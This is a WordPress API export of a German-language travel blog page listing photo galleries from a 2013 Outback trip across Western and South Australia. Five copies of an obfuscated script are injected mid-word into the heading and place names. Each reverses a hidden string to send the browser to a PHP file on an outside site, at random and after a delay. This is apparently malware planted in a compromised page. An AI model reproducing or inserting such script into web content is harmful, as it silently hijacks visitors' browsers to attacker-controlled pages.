{"id":971,"date":"2013-02-14T12:24:24","date_gmt":"2013-02-14T11:24:24","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?page_id=971"},"modified":"2019-07-02T10:10:59","modified_gmt":"2019-07-02T09:10:59","slug":"australias-outback","status":"publish","type":"page","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/australientour-2019\/australias-outback","title":{"rendered":"Outback 2013"},"content":{"rendered":"<p><\/p>\n<h3>Und hier die Fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tos der Outback<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tour 2013<\/h3>\n<p>&nbsp;<\/p>\n<p><strong>Fremantle (Freo), WA, Australia,<\/strong> 2. bis 4. April 2013<\/p>\n<p>ngg_shortcode_0_placeholder<br \/>\n<strong>Swan Valley bis Rockingham, WA, Australia,<\/strong> 29. M\u00e4rz bis 1. April 2013<\/p>\n<p>ngg_shortcode_1_placeholder<br \/>\n<strong>Toodyay, York und Mundaring, WA, Australia,<\/strong> 26. bis 28. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_2_placeholder<br \/>\n<strong>Wanerie, Gingin und die weissen D\u00fcnen von Lancelin, WA, Australia,<\/strong> 23. bis 25. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_3_placeholder<br \/>\n<strong>Perenjori bis Gerald<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>ton, WA, Australia,<\/strong> 20. bis 22. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_4_placeholder<br \/>\n<strong>Perenjori bis Dongara\/Port Denison, WA, Australia,<\/strong> 18. bis 20. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_5_placeholder<br \/>\n<strong>Leinster bis Sands<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tone, WA, Australia,<\/strong> 16. bis 18. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_6_placeholder<br \/>\n<strong>Great Central Road bis Kookynie, WA, Australia,<\/strong> 12. bis 15. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_7_placeholder<br \/>\n<strong>Ayers Rock und Kata Tjutas, SA, Australia,<\/strong> 10. bis 12. M\u00e4rz 2013<\/p>\nngg_shortcode_8_placeholder\n<p><strong>Kings Canyon, SA, Australia,<\/strong> 9. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_9_placeholder<br \/>\n<strong>Rainbow Valley und Alice Springs, SA, Australia,<\/strong> 6. bis 8. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_10_placeholder<br \/>\n<strong>Painted Desert, SA, Australia,<\/strong> 5. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_11_placeholder<br \/>\n<strong>Coober Pedy, SA, Australia,<\/strong> 4. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_12_placeholder<br \/>\n<strong>Oodnadatta bis Coober Pedy, SA, Australia,<\/strong> 1. bis 3. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_13_placeholder<br \/>\n<strong>Parachilna bis Marree, SA, Australia,<\/strong> 28. Februar bis 1. M\u00e4rz 2013<\/p>\n<p>ngg_shortcode_14_placeholder<br \/>\n<strong>Port Augusta, SA, Australia,<\/strong> 27. Februar 2013<\/p>\n<p>ngg_shortcode_15_placeholder<br \/>\n<strong>Nullarbor und die Roadhouses, WA und SA, Australia,<\/strong> 25. bis 27. Februar 2013<\/p>\n<p>ngg_shortcode_16_placeholder<br \/>\n<strong>Esperance auf&#8217;s Nullarbor, WA, Australia,<\/strong> 24. bis 25.&nbsp;Februar 2013<\/p>\n<p>ngg_shortcode_17_placeholder<br \/>\n<strong>Albany bis Esperance, WA, Australia,<\/strong> 21. bis 23.&nbsp;Februar 2013<\/p>\n<p>ngg_shortcode_18_placeholder<br \/>\n<strong>Bussel<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>ton bis Albany, WA, Australia,<\/strong> 18. bis 20.&nbsp;Februar 2013<\/p>\n<p>ngg_shortcode_19_placeholder<br \/>\n<strong>Perth bis Fremantle, WA, Australia,<\/strong> 17. Februar 2013<\/p>\nngg_shortcode_20_placeholder\n<p>&nbsp;<\/p>\n<p>Wir sind&nbsp;Down Under und werden die n\u00e4chsten Wochen im Outback verbringen.&nbsp;Unsere Reise beginnt in Perth WA (AU) und f\u00fchrt uns dann weiter in die rote Mitte und zur\u00fcck.<\/p>\n<p>Nach M\u00f6glichkeit werde ich Bilder und Berichte publizieren, wird aber sicher ab und an dauern, da wir \u00fcber 2500 km auf Sandpiste (4WD) und ohne Verbindung zur Zivilisation sein werden \ud83d\ude42<\/p>\n<p>&nbsp;<\/p>","protected":false},"excerpt":{"rendered":"<p>Und hier die Fotos der Outbacktour 2013 &nbsp; Fremantle (Freo), WA, Australia, 2. bis 4. April 2013 Swan Valley bis Rockingham, WA, Australia, 29. M\u00e4rz bis 1. April 2013 Toodyay, York und Mundaring, WA, Australia, 26. bis 28. M\u00e4rz 2013 Wanerie, Gingin und die weissen D\u00fcnen von Lancelin, WA, Australia, 23. bis 25. M\u00e4rz 2013&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":3466,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/971"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=971"}],"version-history":[{"count":127,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/971\/revisions"}],"predecessor-version":[{"id":3772,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/971\/revisions\/3772"}],"up":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/3466"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}